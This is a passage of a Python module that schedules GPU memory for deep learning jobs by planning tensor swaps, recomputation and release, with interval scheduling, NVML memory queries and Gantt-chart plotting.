return f'id={self.tensor.tensor_id}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}, access_type={self.access_type}, release_flag={self.release_flag}'
class SwapTask(object):
'''Date weighted interval'''
def __init__(self, tensor, time, time_cost, task_type: TaskType, front_boundary=None, back_boundary=None):
self.tensor = tensor
self.time_cost = time_cost
self.data_type = np.float64
self.task_type = task_type
self.swap_task_id = None
assert not (front_boundary is None and back_boundary is None)
        # earliest allowed start time
        self.front_boundary = front_boundary
        # latest allowed end time
        self.back_boundary = back_boundary
self.time = time
self.execute_time = None
self.execute_ref = None
self.start_time_ = None
self.end_time_ = None
@property
def start_time(self):
return self.start_time_
@start_time.setter
def start_time(self, value):
self.start_time_ = value
if self.task_type == TaskType.swap_out:
self.time = self.start_time_
@property
def end_time(self):
return self.end_time_
@end_time.setter
def end_time(self, value):
self.end_time_ = value
if self.task_type == TaskType.swap_in:
self.time = self.end_time_
@classmethod
    def from_access(cls, access: TensorAccess, task_type, front_boundary=None, back_boundary=None):
        return cls(access.tensor, access.time, access.tensor.swap_time, task_type, front_boundary=front_boundary, back_boundary=back_boundary)
def __repr__(self):
return f'id={self.tensor}, type={self.task_type}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}'
def numpy_ewma_vectorized(data, window):
alpha = 2 / (window + 1.0)
alpha_rev = 1 - alpha
n = data.shape[0]
pows = alpha_rev ** (np.arange(n + 1))
scale_arr = 1 / pows[:-1]
offset = data[0] * pows[1:]
pw0 = alpha * alpha_rev ** (n - 1)
mult = data * pw0 * scale_arr
cumsums = mult.cumsum()
out = offset + cumsums * scale_arr[::-1]
return out
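# Sanity check (not used by the scheduler itself): with alpha = 2 / (window + 1)
# this should match the recursive EWMA y[i] = alpha * x[i] + (1 - alpha) * y[i - 1]
# with y[0] = x[0], i.e. pandas' Series.ewm(span=window, adjust=False).mean().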
debug_num = 0
def create_model(n):
model = Sequential()
model.add(Dense(units=2048, activation='tanh', input_dim=n))
model.add(Dense(units=2048, activation='tanh'))
model.add(Dense(units=1, activation='relu'))
return model
def load(opname, n):
model = create_model(n)
model.load_weights('model_parameter/' + opname + '_model.hdf5', by_name=True, skip_mismatch=True)
return model
def get_predicted_execution_time(op_name, inputs_of_model, logged_time: list):
return logged_time[0]
def liveness_analysis(tensor_access_list):
global tensor_access_by_tensor
    # generate liveness analysis results
for job_id in range(len(tensor_access_list)):
tmp = set()
for i in range(len(tensor_access_list[job_id]) - 1, -1, -1):
tensor_access = tensor_access_list[job_id][i]
accesses_of_tensor = tensor_access_by_tensor[tensor_access.tensor.job_id][tensor_access.tensor]
if tensor_access.tensor not in tmp and len(accesses_of_tensor) > 1 and tensor_access == accesses_of_tensor[-1]:
                # parameters are never released
if not tensor_access.tensor.is_parameter:
tmp.add(tensor_access.tensor)
tensor_access.release_flag = True
def is_overlap(task: SwapTask, target: SwapTask):
return task != target and (
target.start_time < task.end_time < target.end_time or target.start_time < task.start_time < target.end_time or task.start_time < target.end_time < task.end_time or task.start_time < target.start_time < task.end_time)
def get_free_intervals(target_task, swap_schedule, access_of_target_tensor, key=0, asc=True):
target_task.tensor.update_swap_time()
    # list all free time intervals within the feasible window and sort them by interval
if target_task.back_boundary - target_task.front_boundary < target_task.time_cost:
return []
intervals = []
for task in swap_schedule:
# if target_task.back_boundary < task.start_time:
# continue
# elif task.end_time < target_task.front_boundary:
# break
if target_task.front_boundary <= task.start_time < task.end_time <= target_task.back_boundary:
intervals.append((task.start_time, task.end_time))
elif task.start_time < target_task.front_boundary < task.end_time < target_task.back_boundary:
intervals.append((target_task.front_boundary, task.end_time))
elif target_task.front_boundary < task.start_time < target_task.back_boundary < task.end_time:
intervals.append((task.start_time, target_task.back_boundary))
elif task.start_time < target_task.front_boundary < target_task.back_boundary < task.end_time:
return []
intervals = sorted(intervals, key=lambda x: x[0])
    # merge intervals so that no two of them overlap
occupied_intervals = []
i = 0
while i < len(intervals):
interval = intervals[i]
l = interval[0]
r = interval[1]
flag = False
while i < len(intervals) - 1 and intervals[i + 1][0] <= r:
r = max(r, intervals[i + 1][1])
flag = True
i += 1
occupied_intervals.append((l, r))
if not flag:
i += 1
not_occupied_intervals = []
s = target_task.front_boundary
for interval in occupied_intervals:
if s < interval[0]:
not_occupied_intervals.append((s, interval[0]))
s = interval[1]
if s < target_task.back_boundary:
not_occupied_intervals.append((s, target_task.back_boundary))
if len(not_occupied_intervals) == 0:
return []
i = 0
j = 0
    # sort by interval start point
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=False)
    # keep intervals from overlapping with accesses of the tensor being scheduled
while j < len(access_of_target_tensor):
if i >= len(not_occupied_intervals):
break
access = access_of_target_tensor[j]
start, end = not_occupied_intervals[i]
if start < access.start_time < end <= access.end_time:
not_occupied_intervals[i] = (start, access.start_time)
i += 1
elif start < access.start_time < access.end_time < end:
not_occupied_intervals[i] = (start, access.start_time)
not_occupied_intervals.insert(i + 1, (access.end_time, end))
i += 1
j += 1
elif start == access.start_time < end < access.end_time:
not_occupied_intervals.pop(i)
j += 1
elif access.start_time <= start < access.end_time < end:
not_occupied_intervals[i] = (access.end_time, end)
j += 1
elif access.start_time <= start < end <= access.end_time:
not_occupied_intervals.pop(i)
else:
j += 1
    # sort by interval end point
if not asc:
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=not asc)
return not_occupied_intervals
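# Intent sketch: for a swap task whose feasible window is
# [front_boundary, back_boundary], the result is the list of sub-intervals of
# that window not occupied by already scheduled swap tasks or by accesses of
# the same tensor, sorted by start point (asc=True) or end point otherwise.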
def generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num):
swap_orders = defaultdict(list)
release_orders = defaultdict(list)
recomp_orders = defaultdict(list)
for job_id in range(job_num):
        # sort by id
tensor_accesses = sorted([i for tmp in tensor_access_by_tensor[job_id].values() for i in tmp], key=lambda x: x.tensor.tensor_id)
        # sort by start time
swap_tasks = sorted(swap_scheduler[job_id], key=lambda x: x.start_time)
for i in range(len(swap_tasks)):
swap_tasks[i].swap_task_id = i
releases = []
swaps = []
recomps = []
for access in tensor_accesses:
if access.release_flag:
releases.append((access.operation_id, access.tensor.tensor_id))
release_orders[job_id] = releases
for access in recomputations:
recomps.append((access.operation_id, access.tensor.tensor_id, access.release_for_recomputation))
recomp_orders[job_id] = recomps
for task in swap_tasks:
# if task.task_type==TaskType.swap_out:
# (task_id, node_id(tensor_id), start_time, start_node, move_to_gpu, start_node_type)
ref = task.execute_ref.operation_id
swaps.append([task.tensor.tensor_id, task.execute_time, ref, 0 if task.task_type == TaskType.swap_out else 1, 1, task.start_time])
swap_orders[job_id] = list(map(lambda x: x[:-1], sorted(swaps, key=lambda x: x[-1])))
return release_orders, swap_orders, recomp_orders
def draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num):
for job_id in range(job_num):
tmp = list(tensor_access_by_tensor[job_id].values())
res = []
for sub_list in tmp:
res.extend(sub_list)
draw(sorted(res, key=lambda x: x.start_time), swap_scheduler[job_id])
class MemoryAnalyzer:
def __init__(self, tensor_access_list, tensors):
self.tensor_access_list = tensor_access_list
self.tensors = tensors
self.next_swap_tasks_index = 0
    def insert_sort(self, list_with_order: list, list_b: list, cmp):
        # ascending order
        for obj_b in list_b:
            i = 0
            mid = 0
            j = len(list_with_order) - 1
            while i < j:
                mid = (i + j) // 2
                obj_mid = list_with_order[mid]
                flag = cmp(obj_mid, obj_b)
                if flag == -1:
                    # mid < b
                    if mid == i:
                        # i = mid <= j and mid < b: compare b with j
                        flag2 = cmp(list_with_order[j], obj_b)
                        if flag2 == -1:
                            # i = mid <= j < b: insert at j + 1
                            mid = j
                        elif flag2 == 1:
                            # i = mid < b < j: insert at j
                            mid = j - 1
                        else:
                            # i = mid <= j = b: insert at j + 1
                            mid = j
                        break
                    i = mid
                elif flag == 1:
                    # b < mid
                    if mid == j:
                        # i <= mid = j and b < mid: compare i with b
                        flag2 = cmp(list_with_order[i], obj_b)
                        if flag2 == -1:
                            # i < b < mid = j: insert at i + 1
                            mid = i
                        elif flag2 == 1:
                            # b < i < mid = j: insert at i
                            mid = i - 1
                        else:
                            # i = b < mid = j: insert at i + 1
                            mid = i
                        break
                    j = mid
                elif flag == 0:
                    # b == mid: insert at mid + 1
                    break
            list_with_order.insert(mid + 1, obj_b)
        return list_with_order
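    # Design note: binary-search insertion keeps the time axis sorted so each
    # scheduling round updates it incrementally instead of re-sorting every
    # event, which matters because get_max_memory_used is called repeatedly.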
def custom_cmp(self, x, y):
if x.time < y.time:
return -1
elif x.time > y.time:
return 1
else:
if x.start_time < y.start_time:
return -1
elif x.start_time > y.start_time:
return 1
else:
# if isinstance(x,TensorAccess) and isinstance(y, SwapTask):
# return 1
# elif isinstance(x, SwapTask) and isinstance(y, TensorAccess):
# return -1
return 0
def custom_cmp_end_time(self, x, y):
if x.end_time < y.end_time:
return -1
elif x.end_time > y.end_time:
return 1
else:
return 0
def get_max_memory_used(self, swap_tasks, swapped_out_tensor):
delta = len(swap_tasks)
if self.next_swap_tasks_index == 0:
            # initialize the time axis
tmp = copy.copy(self.tensor_access_list)
tmp.extend(swap_tasks)
self.time_axis = sorted(tmp, key=cmp_to_key(self.custom_cmp))
self.end_time_axis = sorted(copy.copy(tmp), key=cmp_to_key(self.custom_cmp_end_time))
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
else:
            # update the time axis
# assert swap_tasks[:self.next_swap_tasks_index] == self.last_unused_swap_tasks
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
swap_tasks = swap_tasks[self.next_swap_tasks_index:]
self.time_axis = self.insert_sort(self.time_axis, swap_tasks, self.custom_cmp)
self.end_time_axis = self.insert_sort(self.end_time_axis, swap_tasks, self.custom_cmp_end_time)
self.index_of_end_time_axis = {self.end_time_axis[i]: i for i in range(len(self.end_time_axis))}
        # compute GPU memory usage
# occupied by handle, cudnn, cuda stream and cudart
memory_used = 0
max_memory_actual = float('-inf')
in_gpu_tensors = set()
max_memory_tensors = set()
last_input_tensor_access = None
max_last_access = None
wait_to_be_released = []
max_time = None
# foot_print = {}
        # First, load the inputs x and y and all parameters that were not swapped out into GPU memory, since they have stayed there since the end of the previous iteration
for tensor in self.tensors:
if tensor.in_gpu_at_beginning and tensor not in swapped_out_tensor:
in_gpu_tensors.add(tensor)
memory_used += tensor.size
for time_index, event in enumerate(self.time_axis):
i = len(wait_to_be_released) - 1
while i >= 0:
access = wait_to_be_released[i]
                # if the current time is past the release time, release this access's side effects
if event.time >= access.end_time:
wait_to_be_released.pop(i)
memory_used -= access.tensor.size
in_gpu_tensors.remove(access.tensor)
i -= 1
if isinstance(event, TensorAccess):
if event.access_type == AccessType.output:
if event.tensor not in in_gpu_tensors:
                        # new parameters take no extra space
if event.operation_name not in optimizer_op:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
                    # released as soon as it is done being used
                    # an input by itself does not increase GPU usage; a swap-in does
if event.release_flag:
wait_to_be_released.append(event)
else:
last_input_tensor_access = event
elif isinstance(event, SwapTask):
            # search backwards along the time axis sorted by end time
last_event = None
# idx = end_time_axis.index(event)
idx = self.index_of_end_time_axis[event]
for j in range(idx - 1, -1, -1):
if isinstance(self.end_time_axis[j], TensorAccess) and self.end_time_axis[j].end_time <= event.start_time:
last_event = self.end_time_axis[j]
break
if last_event is None:
last_event = self.tensor_access_list[0]
event.execute_ref = last_event
event.execute_time = event.start_time - last_event.end_time
if event.task_type == TaskType.swap_in:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
memory_used -= event.tensor.size
in_gpu_tensors.remove(event.tensor)
# foot_print[time] = memory_used
if memory_used > max_memory_actual:
                # max_memory_actual simply records the peak, regardless of whether it is worth acting on
max_memory_actual = memory_used
max_memory_tensors = copy.copy(in_gpu_tensors)
max_last_access = last_input_tensor_access
max_time = event.time
self.next_swap_tasks_index = delta
return max_memory_actual, max_memory_tensors, max_last_access, max_time, self.time_axis
def run_global_memory_analysis(swap_tasks, swapped_out_tensor):
global job_num
global global_memory_analyzer
max_memory = 0
max_memory_tensors = []
last_input_accesses = []
max_time = []
# foot_prints = []
time_axis = []
for job_id in range(job_num):
job_max_memory, job_max_memory_tensors, last_input_access, now_time, t_axis = global_memory_analyzer[job_id].get_max_memory_used(swap_tasks[job_id], swapped_out_tensor)
time_axis.append(t_axis)
# foot_prints.append(foot_print)
max_memory_tensors.extend(job_max_memory_tensors)
last_input_accesses.append(last_input_access)
max_time.append(now_time)
max_memory += job_max_memory
return max_memory, max_memory_tensors, last_input_accesses, max_time, time_axis
def draw(tensor_access_list, swap_schedule):
df = []
id_color = {'OTA': 'rgb(255, 0, 102)', 'ITA': 'rgb(68, 114, 196)', 'Swap In': 'rgb(237, 137, 69)', 'Swap Out': 'rgb(112, 173, 71)'}
for tensor_access in tensor_access_list:
        # inputs are blue, outputs are red
df.append(dict(Task=f'tensor_id:{tensor_access.tensor.tensor_id}, size:{tensor_access.tensor.size}', Start=tensor_access.start_time, Finish=tensor_access.end_time,
Resource='OTA' if tensor_access.access_type == AccessType.output else 'ITA'))
for task in swap_schedule:
df.append(dict(Task=f'tensor_id:{task.tensor.tensor_id}, size:{task.tensor.size}', Start=task.start_time, Finish=task.end_time, Resource='Swap In' if task.task_type == TaskType.swap_in else 'Swap Out'))
fig = ff.create_gantt(df, colors=id_color, index_col='Resource', group_tasks=True, show_colorbar=True, showgrid_x=True, showgrid_y=True, title=f'ratio={ratio}')
fig['layout']['xaxis'].update({'type': None})
fig.update_layout(
height=900,
width=1600,
)
pyplt(fig, filename=f'../../pic/job{tensor_access_list[0].tensor.job_id}.html', auto_open=True)
def try_swap_in(swap_in_task: SwapTask, swap_scheduler, access_of_target_tensor):
    # the later the swap-in the better, so sort free intervals by end time in descending order
free_intervals = get_free_intervals(swap_in_task, swap_scheduler[swap_in_task.tensor.job_id], access_of_target_tensor, 1, asc=False)
succeed = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_in_task.time_cost:
swap_in_task.end_time = interval[1]
swap_in_task.start_time = swap_in_task.end_time - swap_in_task.time_cost
swap_scheduler[swap_in_task.tensor.job_id].append(swap_in_task)
succeed = True
break
if not succeed:
return False
else:
return True
def can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
    # Swapping in the first access is the minimum for success; if later accesses can also be swapped in, set the previous access's release_flag to True
access = all_access_of_tensor[i]
swap_in_task = SwapTask(access.tensor, access.time, access.tensor.swap_time, TaskType.swap_in,
front_boundary=swap_out_task.end_time if swap_out_task.end_time > all_access_of_tensor[i - 1].end_time else all_access_of_tensor[i - 1].end_time,
back_boundary=access.time)
return try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[swap_in_task.tensor.job_id][swap_in_task.tensor])
def get_framework_info(info, logged_time, job_id):
global global_tensors
tensors = {}
tensor_access_list = []
global_time = 0
parameter = []
    # tensor_id: execution time of the operator that generates the tensor
operator_execution_time = []
# for output_tensor_id, input_tensor_id, output_tensor_size, operation_name, is_parameter, shape, inputs_of_model in info:
for tensor_info, input_tensor_id, operation_name, operation_id, is_parameter, inputs_of_model, _ in info:
        # is_parameter: whether the generated tensor is a parameter
        # input sizes are in bytes
        # converted to MB below
input_tensors = []
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_tensors.append(input_tensor)
time_cost = get_predicted_execution_time(operation_name, inputs_of_model, logged_time[operation_id])
for output_tensor_id, output_tensor_size, shape in tensor_info:
output_tensor_size = output_tensor_size / 1000000
operator_execution_time.append(time_cost)
if operation_name in optimizer_op:
is_parameter = 1
output_tensor = Tensor(tensor_id=output_tensor_id, job_id=job_id, size=output_tensor_size, source_tensors=input_tensors, recomputation_time=time_cost, is_parameter=is_parameter, shape=shape)
output_access = TensorAccess(tensor=output_tensor, time=global_time + time_cost, run_time=time_cost, access_type=AccessType.output, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(output_access)
tensors[output_tensor.tensor_id] = output_tensor
if is_parameter:
parameter.append(output_tensor)
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_access = TensorAccess(tensor=input_tensor, time=global_time, run_time=time_cost, access_type=AccessType.input, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(input_access)
global_time += time_cost
tensors = list(tensors.values())
global_tensors[job_id] = tensors
tensor_access_list = sorted(tensor_access_list, key=lambda x: x.time)
dic = defaultdict(list)
for access in tensor_access_list:
dic[access.tensor].append(access)
for k, v in dic.items():
dic[k] = sorted(v, key=lambda x: x.time)
tensor_access_by_tensor[job_id] = dic
swap_scheduler = []
    # schedule swap-ins for the parameters
    # earliest_swap = None
    # earliest_time = float('inf')
    # start scheduling from the earliest parameter
parameter = sorted(parameter, key=lambda x: dic[x][0].start_time)
return tensor_access_list, swap_scheduler, parameter, operator_execution_time
# parameters for randomly generated test data
times = 150
tensors = 50
time_scale = times
ratio = 1
# global variables
job_num = 0
global_tensor_access = [[]]
tensor_access_by_tensor = []
weight = 1
jobs_weights = []
# jobs_weight = [1, 1, 1, 1, 1]
total_memory = 0
enable_recomputation = True
global_graphs = []
global_tensors = {}
swap_scheduler = []
parameters = []
models = {}
global_memory_analyzer = []
# load_all_model()
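# Reset all per-job global state, query the free GPU memory, and rebuild tensor/access info for every recorded graph.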
def init(logged_times: list, gpu: int):
global job_num
global global_tensor_access
global tensor_access_by_tensor
global total_memory
global handle
global jobs_weights
global global_graphs
global global_tensors
global swap_scheduler
global parameters
global global_memory_analyzer
global_tensor_access = [[]]
tensor_access_by_tensor = []
global_tensors = {}
swap_scheduler = []
parameters = []
global_memory_analyzer = []
graphs = global_graphs
jobs_weights = [weight for _ in range(len(graphs))]
tensor_access_by_tensor = [[] for _ in range(job_num)]
    # query the total free GPU memory right now
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu)
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
job_num = len(graphs)
tmp = [get_framework_info(graphs[i], logged_times[i], i) for i in range(job_num)]
global_tensor_access = [tmp[i][0] for i in range(job_num)]
swap_scheduler = [tmp[i][1] for i in range(job_num)]
parameters = [tmp[i][2] for i in range(job_num)]
for i in range(job_num):
global_memory_analyzer.append(MemoryAnalyzer(global_tensor_access[i], global_tensors[i]))
def add_job(graph, job_id, gpu: int):
global global_graphs
assert job_id == len(global_graphs) or global_graphs[job_id] is None
if job_id == len(global_graphs):
global_graphs.append(graph)
else:
global_graphs[job_id] = graph
init([[] for _ in range(job_num)], gpu)
def remove_job(job_id, gpu: int):
global global_graphs
global_graphs[job_id] = None
init([], gpu)
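# Main planning loop: alternately schedule swap-out/swap-in pairs and (if enabled) recomputation until the peak memory footprint stops improving, then emit per-job release/swap/recomputation orders.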
def generate_scheduling_plan(logged_times, gpu: int):
    # (if logged_times has already been cleared by this point, then ...)
    # logged_times: [[(operation_id, [time, time, time])]]; the outer index is job_id
global total_memory
global global_tensors
init(logged_times, gpu)
    # update the estimated times with an exponentially weighted moving average
tensor_nums = list(map(lambda x: len(x), tensor_access_by_tensor))
swap_out_number_limits = [int(weight * tensor_num) for weight, tensor_num in zip(jobs_weights, tensor_nums)]
swap_out_number = [0 for _ in tensor_nums]
swapped_out_tensor = set()
swapped_in_source_tensor = set()
swap_out_dict = {}
swapped_in_access = set()
recomputations = []
recomputation_tensor = set()
    # key: tensor, value: [indices in recomputations of every recomputation that releases this tensor]
    # False when the previous round produced no successful swap_out
swapped_flag = True
recomputation_flag = True
iter = 0
original_memory_used = 0
last_memory_used = 0
job_id_ordered_by_weights = list(map(lambda x: x[0], sorted([(job_id, weights) for job_id, weights in enumerate(jobs_weights)], key=lambda x: x[1], reverse=True)))
max_memory_footprint = []
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
while swapped_flag or (recomputation_flag and enable_recomputation):
# MB
if not debug_mod:
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
max_memory, max_tensors, last_input_accesses, max_time, time_axis = run_global_memory_analysis(swap_scheduler, swapped_out_tensor)
max_memory_footprint.append(max_memory)
        # first-order difference of the peak memory over the last three iterations; keep iterating only while the largest drop exceeds 0.05% of the latest peak or fewer than 100 iterations have run
if len(max_memory_footprint) > 3 and max([max_memory_footprint[i] - max_memory_footprint[i + 1] for i in range(len(max_memory_footprint) - 3, len(max_memory_footprint) - 1)]) < max_memory_footprint[
-1] * 0.0005 and iter > 100:
break
if iter == 0:
original_memory_used = max_memory
liveness_analysis(global_tensor_access)
else:
last_memory_used = max_memory
# print(f'iter:{iter}, max_memory:{max_memory}')
max_tensors = sorted(max_tensors, key=lambda x: x.size, reverse=True)
if swapped_flag:
swapped_flag = False
for tensor in max_tensors:
                # plan a swap_out for this tensor
is_new_parameter = tensor.is_parameter and tensor_access_by_tensor[tensor.job_id][tensor][0].operation_name in optimizer_op and len(tensor_access_by_tensor[tensor.job_id][tensor]) == 1
if not is_new_parameter:
if swap_out_number[tensor.job_id] <= swap_out_number_limits[tensor.job_id] and len(tensor_access_by_tensor[tensor.job_id][tensor]) > 1:
                        # swapped_out means every possible swap_in has already been scheduled
if tensor not in swapped_out_tensor:
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor][1:]
                            # first determine the swap_out time window: no later than the current moment, no earlier than the end of the first access
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
if last_input_accesses[tensor.job_id] is not None:
                                # the current moment
back_boundary = last_input_accesses[tensor.job_id].time
else:
last_time_access = tensor_access_by_tensor[tensor.job_id][tensor][-1]
back_boundary = last_time_access.time + tensor.swap_time
succeed = False
front_boundary = output_access.time
# failed_input_access = []
swap_out_succeed = True
have_next_ITA = True
                            # if the swap out itself cannot be placed, there is no need to keep updating the feasible interval; break directly
while not succeed and front_boundary < back_boundary and swap_out_succeed and have_next_ITA:
swap_out_task = SwapTask(tensor, output_access.time, tensor.swap_time, TaskType.swap_out, front_boundary=front_boundary, back_boundary=back_boundary)
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
selected_first_access_index = None
                                # pick a free interval large enough to hold the task
swap_out_succeed = False
have_next_ITA = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_succeed = True
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
                                        # check whether the first subsequent swap_in can be placed
for i, access in enumerate(all_access_of_tensor):
                                            # find the first access after the swap_out
if access.start_time >= swap_out_task.end_time:
have_next_ITA = True
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(access)
swap_out_number[tensor.job_id] += 1
selected_first_access_index = i
succeed = True
swapped_flag = True
else:
# failed_input_access.append(access)
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
                                                    # tighten swap_out_task's front boundary to the end time of this failed input_access
front_boundary = access.end_time
assert tensor not in swapped_out_tensor
# swapped_out_tensor.remove(tensor)
break
if not succeed:
if swap_out_task in swap_scheduler[swap_out_task.tensor.job_id]:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
                                            # if the failure was not caused by the swap out placement itself, regenerate the intervals
break
else:
break
                            # scheduling failed
if not succeed:
continue
if not is_new_parameter:
                                # for each later access that can be swapped in, set the previous access's release_flag to True
for i in range(selected_first_access_index + 1, len(all_access_of_tensor)):
access = all_access_of_tensor[i]
if i == 0 or access in swapped_in_access:
continue
else:
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
                                            # print(f'succeeded: {access}')
swapped_in_access.add(access)
if all_access_of_tensor[i - 1].start_time > swap_out_task.end_time:
all_access_of_tensor[i - 1].release_flag = True
if swapped_flag:
break
                # if this is a new parameter, try to swap out the new parameter and swap in the corresponding old parameter
else:
if tensor not in swapped_out_tensor:
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
swap_out_task = SwapTask(tensor, time=output_access.time, time_cost=tensor.swap_time, task_type=TaskType.swap_out, front_boundary=output_access.end_time, back_boundary=float('inf'))
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
                                # find the corresponding old parameter tensor
                                # the two feasible regions are independent, so just check whether the matching swap in can be scheduled
for t in tensor.source_tensors:
if t.is_parameter and t not in swapped_in_source_tensor:
                                        # attempt a swap in
                                        # find the first input access (the feed_dict access is not actually used)
first_access = tensor_access_by_tensor[t.job_id][t][1]
assert first_access.access_type == AccessType.input
swap_in_task = SwapTask(t, first_access.time, first_access.tensor.swap_time, TaskType.swap_in, front_boundary=0, back_boundary=first_access.start_time)
res = try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[t.job_id][t])
# assert not res, f'swap in parameter:{t} failed'
if res:
swapped_in_source_tensor.add(t)
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(first_access)
swap_out_number[tensor.job_id] += 1
swapped_flag = True
else:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
assert tensor not in swapped_out_tensor
break
break
elif enable_recomputation:
recomputation_flag = False
            # recomputation is needed
if max_memory >= total_memory:
for job_id in job_id_ordered_by_weights:
max_tensors_filtered = []
for tensor in max_tensors:
                        # the tensor is not a parameter, has never been evicted, and none of its source tensors has ever been swapped or recomputed
if not tensor.is_parameter and tensor not in swapped_out_tensor and tensor.source_tensors is not None and len(tensor.source_tensors) > 0 and \
False not in [t not in swapped_out_tensor for t in tensor.source_tensors] and False not in [t not in recomputations for t in tensor.source_tensors]:
max_tensors_filtered.append(tensor)
if len(max_tensors_filtered) == 0:
continue
max_tensors_by_metric = sorted(max_tensors_filtered, key=lambda x: x.recomputation_metric, reverse=True)
                    # pick the tensor with the largest recomputation metric
tensor = max_tensors_by_metric[0]
                    # find the next access relative to the current moment
now_time = max_time[job_id]
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor]
for i, access in enumerate(all_access_of_tensor):
if access.access_type == AccessType.input and access not in recomputations:
if access.start_time >= now_time:
for source_tensor in access.tensor.source_tensors:
accesses = tensor_access_by_tensor[source_tensor.job_id][source_tensor]
for temp_acc in accesses:
                                    # make sure tensors whose source has already been released are not recomputed
if temp_acc.release_flag and temp_acc.end_time <= access.start_time:
break
else:
recomputations.append(access)
all_access_of_tensor[i - 1].release_flag = True
recomputation_flag = True
recomputation_tensor.add(access.tensor)
break
break
iter += 1
# fig = go.Figure(data=[go.Scatter(x=list(original_memory_footprint[0].keys()), y=list(original_memory_footprint[0].values())), go.Scatter(x=list(foot_prints[0].keys()), y=list(foot_prints[0].values()))])
# plotly.offline.plot(fig, filename='../../pic/footprint.html')
# if not debug_mod:
# total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
# else:
# total_memory = 6000
# stats = 'succeed' if max_memory < total_memory else ' failure'
# print(f'scheduling {stats}')
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
memory_saved_ratio = format((1 - last_memory_used / original_memory_used) * 100, '.2f')
print(f'memory_saved_ratio:{memory_saved_ratio}%')
print(f'swap ratio:{len(swap_scheduler[0]) / len(global_tensors)}')
# print(f'recomputations:{recomputations}')
return generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num)
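# Scheduler process entry point: consumes graph/timing messages from the executors and pushes back per-job control messages (swap, release, recomputation orders).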
def multiprocess_init(global_message_queue: multiprocessing.Queue, global_control_queue: multiprocessing.Queue, total_job_number):
# swap_order = [(20, 0, 20, 0)]
# control_messages = []
# control_message = [swap_order, [], []]
# control_messages.append(control_message)
# global_control_queue.put(control_messages)
logged_times = []
log_repeat = 0
alpha = 0.9
second_schedule_finished = False
    # todo: set up the job_id mapping from executor to algorithm
map_out_to_in = {}
map_in_to_out = {}
global job_num
job_num = 0
while True:
if not global_message_queue.empty():
global_message = global_message_queue.get()
job_id = global_message[0]
message_type = global_message[1][0]
message_graph = global_message[1][1]
if message_type == 0:
# print("job_id =", job_id)
job_num += 1
map_out_to_in[job_id] = job_num - 1
map_in_to_out[job_num - 1] = job_id
job_id_in = job_num - 1
logged_times.append([])
global_graphs.append(message_graph)
tensor_num = len(message_graph)
# with open("../../global_graphs", "wb") as f1:
# pickle.dump(global_graphs, f1)
for i in range(tensor_num):
# print(message_graph[i][6])
logged_times[job_id_in].append([message_graph[i][6]])
s = time.time()
if job_num == total_job_number:
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(f'time:{time.time() - s}')
control_messages = {}
for i in range(job_num):
# print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
else:
job_id_in = map_out_to_in[job_id]
total_time_old = 0
for run_time in logged_times[job_id_in]:
total_time_old += run_time[0]
total_time_new = 0
for run_time in message_graph:
total_time_new += run_time[1]
change_rate = abs(total_time_new - total_time_old) / total_time_old
print("change rate is ", change_rate)
# print("total time new is", total_time_new)
# print("total time old is", total_time_old)
if change_rate > 0.3:
is_replan = True
else:
is_replan = False
# with open("./log/total_time.txt", "a") as f1:
# print(total_time_new, file=f1)
